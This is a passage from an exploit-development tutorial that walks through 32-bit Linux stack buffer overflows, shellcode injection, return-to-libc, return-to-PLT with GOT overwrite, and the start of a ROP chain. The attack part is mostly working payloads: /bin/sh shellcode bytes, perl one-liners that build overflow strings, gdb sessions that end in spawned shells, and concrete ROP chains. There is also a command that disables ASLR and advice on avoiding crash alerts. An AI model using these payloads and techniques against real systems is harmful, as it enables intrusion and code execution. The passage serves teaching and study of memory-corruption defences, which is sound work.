\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff
\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>: ret
(gdb) x/16x $esp
0xbfffef6c: 0x41414141 0x315b16eb 0x074388c0 0x89085b89
0xbfffef7c: 0x0bb00c43 0x8d084b8d 0x80cd0c53 0xffffe5e8
0xbfffef8c: 0x69622fff 0x68732f6e 0xbffff000 0xbffff040
0xbfffef9c: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
We see our shellcode is located at 0xbfffef70, so let's now overwrite the return address with this,
ordering the bytes in reverse to account for little endianness:
(gdb) run `perl -e'print "A"x24 . "\x70\xef\xff\xbf" . "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b
\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e
\x2f\x73\x68"'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x70\xef\xff\xbf" .
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c
\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>: ret
(gdb) x/16x $esp
0xbfffef6c: 0xbfffef70 0x315b16eb 0x074388c0 0x89085b89
0xbfffef7c: 0x0bb00c43 0x8d084b8d 0x80cd0c53 0xffffe5e8
0xbfffef8c: 0x69622fff 0x68732f6e 0xbffff000 0xbffff040
0xbfffef9c: 0x00111478 0x00110414 0xffffffff 0x001f8fbc
(gdb) c
Continuing.
process 22006 is executing new program: /bin/bash
sh-4.1$
III. The Problem
================
Modern hardware and operating systems support a feature called NX bit/DEP, which flags regions of
memory as non-executable. As a security precaution, compilers now mark the stack non-executable to
prevent the execution of shellcode in buffer overflow attacks. Thus, overwriting the return address
with the address of our shellcode on the stack results in a segfault.
To exemplify this point, we can see specifically which regions of memory have what permissions using
the following program:
#include <stdio.h>
int main (int argc, char **argv)
{
FILE *fp = fopen("/proc/self/maps", "r");
char line[1024];
while(fgets(line, sizeof(line), fp) != NULL)
{
printf("%s", line);
}
fclose(fp);
return 0;
}
By running this program, we print the contents of /proc/self/maps. We see that by default, our
program's stack does not possess +x permissions:
[storm@Dysthymia audit]$ ./stacky
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r--p 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rw-p 0001d000 fd:01 19335 /lib/ld-2.13.so
001fc000-0037f000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
0037f000-00380000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
00380000-00382000 r--p 00183000 fd:01 24337 /lib/libc-2.13.so
00382000-00383000 rw-p 00185000 fd:01 24337 /lib/libc-2.13.so
00383000-00386000 rw-p 00000000 00:00 0
00d21000-00d22000 r-xp 00000000 00:00 0 [vdso]
08048000-08049000 r-xp 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky
08049000-0804a000 rw-p 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky
0990b000-0992c000 rw-p 00000000 00:00 0 [heap]
b7893000-b7894000 rw-p 00000000 00:00 0
b78ae000-b78b0000 rw-p 00000000 00:00 0
bfcf5000-bfd16000 rw-p 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$
We can manually flip the executable stack flag in our program's ELF header, disabling this memory
protection for the program:
[storm@Dysthymia audit]$ execstack -s ./stacky
[storm@Dysthymia audit]$ ./stacky
00110000-00111000 rwxp 00000000 00:00 0
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r-xp 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rwxp 0001d000 fd:01 19335 /lib/ld-2.13.so
0034f000-00350000 rwxp 00000000 00:00 0
00350000-004d3000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
004d3000-004d4000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
004d4000-004d6000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so
004d6000-004d7000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so
004d7000-004da000 rwxp 00000000 00:00 0
00673000-00674000 r-xp 00000000 00:00 0 [vdso]
009d5000-009d6000 rwxp 00000000 00:00 0
08048000-08049000 r-xp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky
08049000-0804a000 rwxp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky
08adf000-08b00000 rwxp 00000000 00:00 0 [heap]
bfa61000-bfa82000 rwxp 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$
You may have noticed something odd about the output this program. Comparing the output of the two
separate times running the program, we also notice that the addresses of loaded libraries and
certain other areas of memory changed. This is due to a memory protection technique called Address
Space Layout Randomization (ASLR). By randomizing the location of data in a process's address
space, exploit writers cannot reliably predict where certain key functions or code are located in
memory, turning reliable exploits into improbable gambles. An area of research is devoted to
exploiting applications enabled with ASLR, but that is much beyond the scope of this paper.
For the sake of taking one step at a time, let's disable ASLR for our examples:
[storm@Dysthymia audit]$ su -
Password:
[root@Dysthymia ~]# echo 0 > /proc/sys/kernel/randomize_va_space
[root@Dysthymia ~]# logout
[storm@Dysthymia audit]$ ./stacky
00110000-00111000 r-xp 00000000 00:00 0 [vdso]
00111000-00113000 rwxp 00000000 00:00 0
0012d000-0012e000 rwxp 00000000 00:00 0
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r-xp 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rwxp 0001d000 fd:01 19335 /lib/ld-2.13.so
001fc000-0037f000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
0037f000-00380000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
00380000-00382000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so
00382000-00383000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so
00383000-00386000 rwxp 00000000 00:00 0
08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
08049000-0804a000 rwxp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
0804a000-0806b000 rwxp 00000000 00:00 0 [heap]
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$ ./stacky
00110000-00111000 r-xp 00000000 00:00 0 [vdso]
00111000-00113000 rwxp 00000000 00:00 0
0012d000-0012e000 rwxp 00000000 00:00 0
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r-xp 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rwxp 0001d000 fd:01 19335 /lib/ld-2.13.so
001fc000-0037f000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
0037f000-00380000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
00380000-00382000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so
00382000-00383000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so
00383000-00386000 rwxp 00000000 00:00 0
08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
08049000-0804a000 rwxp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
0804a000-0806b000 rwxp 00000000 00:00 0 [heap]
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$
Much better.
Getting back to the original problem, the question is, how can an attacker successfully and reliably
exploit a simple stack-based buffer overflow when the stack is flagged non-executable? With
ret2libc, of course!
IV. Return-to-libc
==================
The premise of ret2libc is actually quite simple. Thinking back to how a standard buffer overflow
works, we recognize that our ultimate goal is to return into code that does our evil bidding, most
likely dropping a bash prompt or spawning a reverse shell. Knowing that we are unable to provide
our own code to return into (thanks to non-executable stack and heap), we must take a step back and
think about our options.
Our guidelines are as follows:
- Code must be (obviously) present in the process's address space at the time of exploitation
- Code must be flagged executable
- Code must be located at a predictable address
- Code must perform an action that is beneficial to our goals (spawning a shell)
Where will we ever find code that satisfies all of our needs?
Oh, right. libc, the C standard library implementation on Linux.
Let's let Wikipedia be our guide:
The C standard library consists of a set of sections of the ANSI C standard in the
programming language C. They describe a collection of headers and library routines
used to implement common operations such as input/output and string handling.
Unix-like systems typically have a C library in shared library form.
- http://en.wikipedia.org/wiki/Libc
To clarify and expand on the definition, libc is a shared library present on nearly all Linux
systems that is, by default, linked against every program compiled with gcc. libc is an
implementation of the C standard, providing the code that performs common, rudimentary operations
such as printing strings and allocating memory. Every time you make a function call to printf()
or malloc() from within a C program, you are most likely running code in libc.
Let's go down our checklist. libc is certainly present in the address space of almost every process
running on Linux. The code is flagged executable, because it is legitimate code used by the program
itself. By disabling ASLR, we are ensuring that the library will be loaded at the same base address
every time, allowing us to reliably predict where in memory it will be located. Since libc provides
an exceptionally wide array of functions, there is a good chance we can abuse one of them to gain
access to the system.
Let's start building a template for our exploit:
AAAAAAAAAAAAAAAAAAAAAAAA [ libc function ] [ return-to ] [ arg1 ] [ arg2 ] ...
^ ^ | |
| | | |
overflow ("A"x24) --------------------------------------
Obviously, we want to return into a libc function that lets us execute arbitrary code. A good
candidate is system(), although there are a number of methods using different functions.
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e1
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x080483e1 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb)
Looking at the output of gdb, we see that system() resides in memory at 0x00235eb0, so let's add
that to our exploit.
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ arg1 ] [ arg2 ] ...
^ ^ | |
| | | |
overflow ("A"x24) --------------------------------------
&system
Now we need to provide an argument to system(), which is a pointer to a null-terminated string of
the command being executed. The simple solution is just to give it a pointer to "/bin/bash", which
we can do by either a) writing it into memory after the exploit string itself, or b) re-using an
already existing instance of the string in memory. Let's be lazy and choose the latter.
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb) x/s 0xbffff310
0xbffff310: "/bin/bash"
(gdb) x/s 0xbffff30a
0xbffff30a: "SHELL=/bin/bash"
(gdb)
Conveniently, we can leverage the SHELL environment variable here. Now that we have a pointer to
our command string, let's update the exploit.
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ \x10\xf3\xff\xbf ]
^ ^ |
| | |
overflow ("A"x24) ------------------------------------
&system arg1: "/bin/bash"
The return-to pointer actually serves as the return address for our libc function. This by nature
isn't necessary to set for the exploit to work, but it's common to return to exit() afterwards to
end the process cleanly and prevent any alerts due to a crashed process. These alerts may be viewed
by monitoring the tail of /var/log/messages (on most distributions).
(gdb) p exit
$2 = {void (int)} 0x22ac00 <exit>
(gdb)
For the sake of adding more unnecessary arrows to the diagram, our finished exploit now looks like:
&exit
--------------------
| \/
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ \x00\xac\x22\x00 ] [ \x10\xf3\xff\xbf ]
^ ^ |
| | |
overflow ("A"x24) ----------------------------------------------
&system arg1: "/bin/bash"
Yeah, cool. Too bad it doesn't work.
As you probably noticed, our exploit contains null bytes everywhere. This is a huge problem, since
we're using strcpy() to copy our exploit string and it will stop as soon as the first null byte is
encountered.
There are actually two factors contributing to having null bytes in this exploit. The first, most
prominent factor is a memory protection called ASCII-Armor, which maps important libraries to
addresses that contain a null byte. As observed, the addresses of system() and exit(), as well as
every other function in libc, started with 0x00.
The second factor is due to there coincidentally being a null byte present elsewhere in the address
of exit(). In addition to ASCII-Armor, the least significant byte of the address is also 0x00.
This is not an especially huge issue, however, since we can simply jump to an offset of exit() that
doesn't alter its actual functionality. Let's take a look:
(gdb) x/10i exit
0x22ac00 <exit>: push %ebp
0x22ac01 <exit+1>: mov %esp,%ebp
0x22ac03 <exit+3>: push %edi
0x22ac04 <exit+4>: push %esi
0x22ac05 <exit+5>: push %ebx
0x22ac06 <exit+6>: call 0x212c6f <__i686.get_pc_thunk.bx>
0x22ac0b <exit+11>: add $0x1573e9,%ebx
0x22ac11 <exit+17>: sub $0x2c,%esp
0x22ac14 <exit+20>: mov 0x8(%ebp),%edi
0x22ac17 <exit+23>: mov 0x330(%ebx),%esi
(gdb)
0x0022ac01 looks pretty good. The only instruction we're skipping is push %ebp, which won't matter
anyways since exit() doesn't return, thus having no need to unwind the stack.
Note that should a positive offset (exit+X) not exist, we can instead search lower in memory and
find a potential negative offset (exit-X). We can do this because the function adjacent to exit()
doesn't terminate with a ret instruction, so jumping into it won't return but instead continue
executing into the next function, which is conveniently exit().
(gdb) x/3i exit-1
0x22abff: add %dl,-0x77(%ebp)
0x22ac02 <exit+2>: in $0x57,%eax
0x22ac04 <exit+4>: push %esi
(gdb)
Oop, looks like an offset of -1 will cause instructions in exit() to be interpreted incorrectly.
Remember that everything in memory is simply data until it is interpreted and given meaning, so by
jumping in the middle of a multi-byte opcode, we are literally interpreting it to be a different
instruction. If this new instruction is smaller than the rest of the original one, then
instructions after it will be affected and interpreted differently also. Let's try an offset of -2:
(gdb) x/3i exit-2
0x22abfe: jbe 0x22ac00 <exit>
0x22ac00 <exit>: push %ebp
0x22ac01 <exit+1>: mov %esp,%ebp
(gdb)
At -2, the exit() function is interpreted correctly, but the two bytes before it are interpreted to
be a conditional jump instruction. This introduces major possibility for the flow of execution to
be thrown off, so let's disregard this option and check offset -3:
(gdb) x/3i exit-3
0x22abfd: lea 0x0(%esi),%esi
0x22ac00 <exit>: push %ebp
0x22ac01 <exit+1>: mov %esp,%ebp
(gdb)
An offset of -3 looks like a good option. The three bytes before exit() are interpreted to be a
harmless lea (load effective address) instruction which won't affect the interpretation or proper
functionality of exit(). So, if for some reason 0x0022ac01 was not a viable option (say, input
filtering), we could substitute it with 0x0022abfd with no consequence.
We still have to deal with the problem of ASCII-Armor, however, so let's move on to talk about a
technique called return-to-PLT.
V. Return-to-PLT
================
The PLT, formally known as the Procedure Linkage Table, is a feature of ELF binaries that assists
with the dynamic linking process. In order to understand how to abuse this feature, we need to
first know a bit about what's happening behind the scenes.
By nature, ELF shared libraries are compiled as position-independent code (PIC), which means that
they function and execute properly regardless of location in memory. This is fundamentally
important to dynamic linking, because if all shared libraries were compiled with a static load
address, a situation would inevitably arise where two libraries shared the same load address or
overlapped each other in memory. By compiling shared libraries as PIC, the ELF linker decides at
runtime which libraries to load and where in memory to map them to.
In order for the running program to find symbols within these libraries, it references a data
structure called the Global Offset Table (GOT), which exists as a table of pointers to within shared
libraries. For Windows exploit developers, the GOT is essentially the same as the Import Address
Table (IAT).
When a function is called for the first time, a small piece of code is executed by the
PLT to resolve the function's actual address. The GOT is patched with this address so that future
calls to the library function's PLT stub directly reference the resolved address, resulting in
greater efficiency. This is called lazy binding.
In the realm of exploitation, if the libc function you wish to call is legitimately used by the
program, then it's as simple as calling the function's PLT stub. For instance, if system() is used
elsewhere in the program, then an entry for it will exist in the PLT. Jumping directly to this
address will execute the PLT stub, resolving the real address of the function in libc (or using the
stored one in the GOT) and calling it. By adding a call to system() elsewhere in our test program,
we can observe this situation and take advantage of it.
[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdlib.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking...
system("/bin/echo woot");
}
int main (int argc, char **argv)
{
foo(argv[1]);
}
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482b4 _init
0x080482f4 __gmon_start__
0x080482f4 __gmon_start__@plt
0x08048304 system
0x08048304 system@plt
0x08048314 __libc_start_main
0x08048314 __libc_start_main@plt
0x08048324 strcpy
0x08048324 strcpy@plt
0x08048340 _start
0x08048370 __do_global_dtors_aux
0x080483d0 frame_dummy
0x080483f4 foo
0x0804841a main
0x08048440 __libc_csu_init
0x080484a0 __libc_csu_fini
0x080484a5 __i686.get_pc_thunk.bx
0x080484b0 __do_global_ctors_aux
0x080484dc _fini
(gdb) break main
Breakpoint 1 at 0x804841d
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x0804841d in main ()
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb) run `perl -e'print "A"x24 . "\x04\x83\x04\x08" . "XXXX" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x04\x83\x04\x08" .
"XXXX" . "\x10\xf3\xff\xbf"'`
Breakpoint 1, 0x0804841d in main ()
(gdb) c
Continuing.
Detaching after fork from child process 8096.
woot
Detaching after fork from child process 8097.
[storm@Dysthymia audit]$ echo We\'ve got shell.
We've got shell.
[storm@Dysthymia audit]$
VI. Return-to-PLT + Overwrite
=============================
Of course, system() is not always going to be available, and sometimes the functions that are
available to just don't cut it. At this point, we can take it another step further and take
advantage of a different feature of dynamic linking by overwriting entries in the GOT itself.
Let's modify our test program a little more before continuing on, removing the call to system() and
adding a call to printf():
[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdio.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking...
}
int main (int argc, char **argv)
{
foo(argv[1]);
printf("Your input: %s\n", argv[1]);
}
[storm@Dysthymia audit]$
Let's take a closer look at the PLT stub for printf():
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482b4 _init
0x080482f4 __gmon_start__
0x080482f4 __gmon_start__@plt
0x08048304 __libc_start_main
0x08048304 __libc_start_main@plt
0x08048314 strcpy
0x08048314 strcpy@plt
0x08048324 printf
0x08048324 printf@plt
0x08048340 _start
0x08048370 __do_global_dtors_aux
0x080483d0 frame_dummy
0x080483f4 foo
0x0804840e main
0x08048450 __libc_csu_init
0x080484b0 __libc_csu_fini
0x080484b5 __i686.get_pc_thunk.bx
0x080484c0 __do_global_ctors_aux
0x080484ec _fini
(gdb) x/3i 0x08048324
0x8048324 <printf@plt>: jmp *0x80496bc
0x804832a <printf@plt+6>: push $0x18
0x804832f <printf@plt+11>: jmp 0x80482e4
(gdb)
This first instruction is interesting. It's dereferencing a pointer to somewhere in the GOT and
then jumping to that value. Let's look back to our program that reads /proc/self/maps:
[storm@Dysthymia audit]$ ./stacky | grep 08049
08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
08049000-0804a000 rw-p 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
[storm@Dysthymia audit]$
It looks like the GOT is writable! By chaining together calls to libc, we can write four arbitrary
bytes to 0x80496bc, effectively relocating printf() to an address of our choosing. The next time
printf() is called, our target code will be run instead. As usual, our goal here will be system().
There is really no reason for a pointer to system() to be present anywhere in memory, so we're going
to have to construct it byte-by-byte. Note that while we're using strcpy() for our exploit, any
function that moves bytes may be used, such as memcpy(), strcat(), or sprintf(). Let's build a new
template:
AAAAAAAAAAAAAAAAAAAAAAAA [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[0] ] [ system[0] ]
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[1] ] [ system[1] ]
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[2] ] [ system[2] ]
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[3] ] [ system[3] ]
[ printf@plt ] [ any 4 bytes ] [ address of "/bin/bash" ]
Conceptually, the process will first return into strcpy(), moving the first byte of &system into the
first byte of GOT entry for printf() (as well as anything after it up until 0x00 since we're using
strcpy(), but this doesn't really matter). Upon returning from strcpy(), it will then jump into a
pop pop ret gadget, which pops the two arguments of the first strcpy() off the stack and returns
into the second strcpy(), granting us the ability to chain libc calls with two arguments.
Wait, did we say gadget? It's almost like we're writing a ROP exploit or something....
A gadget is essentially a small sequence of instructions that exists in the process's address space
that does something useful for our exploit. By returning into a gadget, we can leverage existing
code to manipulate memory and registers in a predictable way. While gadgets come in many different
forms and can perform many different operations, one thing that always remains constant is that they
are terminated by a ret instruction. In a "true" ROP exploit, our libc chain is replaced instead by
a chain of pointers to gadgets, executing one after another to set the process memory in a specific
state to perform a specific task.
For instance, on Windows 32-bit systems, one of the most common methods of ROP exploitation is to
allocate a new executable heap by returning into VirtualAlloc() or marking an existing heap
executable using VirtualProtect(). Gadgets are then used to copy second-stage shellcode onto the
newly-created heap, ultimately jumping into the heap and executing the shellcode.
In order to find our pop pop ret gadget, we'll use msfelfscan, part of the Metasploit framework. If
developing an exploit on Win32, the mona.py plugin for Immunity Debugger by Corelan Team is one of
the best options for not only discovering potential gadget candidates, but automatically chaining
them into workable ROP chains.
[storm@Dysthymia audit]$ msfelfscan | grep \\-p
-p, --poppopret Search for pop+pop+ret combinations
[storm@Dysthymia audit]$ msfelfscan -p ./example
[./example]
0x080483c3 pop ebx; pop ebp; ret
0x080484a7 pop edi; pop ebp; ret
0x080484e8 pop ebx; pop ebp; ret
[storm@Dysthymia audit]$
Any of these gadgets should do fine.
Let's update our template with what we know so far: strcpy@plt, printf@plt, GOT_of_printf, and pop
pop ret. Let's just stick "AAAA" in the return address of the overwritten printf(), since it really
doesn't matter. While we're at it, let's just find the address of "/bin/bash" too:
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x08048411 in main ()
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb)
So, that brings us to:
AAAAAAAAA... [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ system[0] ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ system[1] ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ system[2] ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ system[3] ]
[ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ]
All we have left to do is find the locations of four bytes in memory that will be assembled together
to form &system.
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb)
These four bytes are: 0x00, 0x23, 0x5e, and 0xb0. It will be pretty easy to find these bytes
somewhere in memory, but for the greatest reliability we should confine the search to just within
the loaded program itself. For obvious reasons, we can't directly address the shared libraries, and
the stack and heap are too dynamic for reliable use.
By looking back at the output of ./stacky in the beginning of this paper, we notice that the memory
region 0x08048000-0x0804a000 remains static throughout every invocation of the program, both with
and without ASLR enabled. By looking at the ELF header of ./example, we see that within this region
of memory resides the binary image itself:
[storm@Dysthymia audit]$ readelf -S ./example
There are 30 section headers, starting at offset 0x7ec:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 08048134 000134 000013 00 A 0 0 1 <---- start
[ 2] .note.ABI-tag NOTE 08048148 000148 000020 00 A 0 0 4
[ 3] .note.gnu.build-i NOTE 08048168 000168 000024 00 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0804818c 00018c 000020 04 A 5 0 4
[ 5] .dynsym DYNSYM 080481ac 0001ac 000060 10 A 6 1 4
[ 6] .dynstr STRTAB 0804820c 00020c 000053 00 A 0 0 1
[ 7] .gnu.version VERSYM 08048260 000260 00000c 02 A 5 0 2
[ 8] .gnu.version_r VERNEED 0804826c 00026c 000020 00 A 6 1 4
[ 9] .rel.dyn REL 0804828c 00028c 000008 08 A 5 0 4
[10] .rel.plt REL 08048294 000294 000020 08 A 5 12 4
[11] .init PROGBITS 080482b4 0002b4 000030 00 AX 0 0 4
[12] .plt PROGBITS 080482e4 0002e4 000050 04 AX 0 0 4
[13] .text PROGBITS 08048340 000340 0001ac 00 AX 0 0 16
[14] .fini PROGBITS 080484ec 0004ec 00001c 00 AX 0 0 4
[15] .rodata PROGBITS 08048508 000508 00001c 00 A 0 0 4
[16] .eh_frame_hdr PROGBITS 08048524 000524 000024 00 A 0 0 4
[17] .eh_frame PROGBITS 08048548 000548 00007c 00 A 0 0 4
[18] .ctors PROGBITS 080495c4 0005c4 000008 00 WA 0 0 4
[19] .dtors PROGBITS 080495cc 0005cc 000008 00 WA 0 0 4
[20] .jcr PROGBITS 080495d4 0005d4 000004 00 WA 0 0 4
[21] .dynamic DYNAMIC 080495d8 0005d8 0000c8 08 WA 6 0 4
[22] .got PROGBITS 080496a0 0006a0 000004 04 WA 0 0 4
[23] .got.plt PROGBITS 080496a4 0006a4 00001c 04 WA 0 0 4
[24] .data PROGBITS 080496c0 0006c0 000004 00 WA 0 0 4
[25] .bss NOBITS 080496c4 0006c4 000008 00 WA 0 0 4 <---- end
[26] .comment PROGBITS 00000000 0006c4 00002c 01 MS 0 0 1
[27] .shstrtab STRTAB 00000000 0006f0 0000fc 00 0 0 1
[28] .symtab SYMTAB 00000000 000c9c 000430 10 29 45 4
[29] .strtab STRTAB 00000000 0010cc 000215 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
[storm@Dysthymia audit]$
Using gdb, we can quickly search for hits within this range:
(gdb) find /b /1 0x08048134,0x080496c4,0x00
0x8048146
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0x23
0x804883c
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0x5e
0x8048342 <_start+2>
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0xb0
0x8048294
1 pattern found.
(gdb)
Excellent. Let's update our template one last time:
AAAAAAAAA... [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ \x94\x82\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ \x42\x83\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ \x3c\x88\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ \x46\x81\x04\x08 ]
[ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ]
Tie it all together and let it rip:
(gdb) run `perl -e'print "A"x24 . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbc\x96\x04\x08" .
"\x94\x82\x04\x08" . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbd\x96\x04\x08" .
"\x42\x83\x04\x08" . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbe\x96\x04\x08" .
"\x3c\x88\x04\x08" . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbf\x96\x04\x08" .
"\x46\x81\x04\x08" . "\x24\x83\x04\x08" . "\x41\x41\x41\x41" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbc\x96\x04\x08" . "\x94\x82\x04\x08" . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbd\x96\x04\x08" . "\x42\x83\x04\x08" . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbe\x96\x04\x08" . "\x3c\x88\x04\x08" . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbf\x96\x04\x08" . "\x46\x81\x04\x08" . "\x24\x83\x04\x08" .
"\x41\x41\x41\x41" . "\x10\xf3\xff\xbf"'`
Detaching after fork from child process 14372.
[storm@Dysthymia audit]$ echo hax hax hax
hax hax hax
[storm@Dysthymia audit]$
VII. Return-to-libc by neg ROP
==============================
Readers should make sure they are familiar with all previous sections before continuing on. It's
worthwhile to know that there is, in fact, more than one way to circumvent ASCII-Armor. A second
technique discussed here is much shorter than the GOT overwrite method and relies more heavily on
ROP. For this method, we'll be borrowing a common tactic used by Windows exploit developers.
Instead of assembling an address byte-by-byte and patching the GOT, we can simply load the negated
address of system() into a register, negate the register, and then call the value of the register.
As our program is very small and doesn't contain a lot of code (and therefore very few gadgets to
work with), for the sake of the example we'll introduce a few small functions that provide the
appropriate neg and pop gadgets needed. Larger applications will have more code and more gadgets to
choose from, greatly increasing our chances of constructing a complete, featureful ROP chain.
[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking...
}
int coff (int p)
{
int x = 50008; // this integer generates a 'pop eax; ret' sequence
int d = x-p;
printf("Difference from threshold: %i\n", d);
return d;
}
int tcomp (int p)
{
return -p; // will produce a 'pop eax' gadget
}
int main (int argc, char **argv)
{
